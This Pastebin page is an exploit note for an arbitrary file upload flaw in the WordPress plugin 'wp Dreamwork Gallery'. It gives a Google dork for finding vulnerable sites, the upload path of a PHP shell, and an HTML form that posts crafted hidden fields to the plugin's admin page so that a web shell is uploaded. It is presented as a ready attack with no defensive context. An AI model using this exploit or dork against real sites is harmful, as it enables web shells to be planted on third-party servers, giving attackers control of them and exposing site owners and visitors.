Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: Arbitrary File Upload Vulnerability in wp Dreamwork Gallery
- # Category: webapps
- # Google Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/
- # contact: fb.com/xhac.kerr
- =======================================================================
- shell path:/wp-content/uploads/dreamwork/7_uploadfolder/big/shellname.php
- exploit
- <html>
- <body>
- <form action="http://www.site.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
- <input type="hidden" name="task" value="drm_add_new_album" />
- <input type="hidden" name="album_name" value="Arbitrary File Upload" />
- <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
- <input type="file" name="album_img" value="" />
- <input type="submit" value="Submit" />
- </form>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
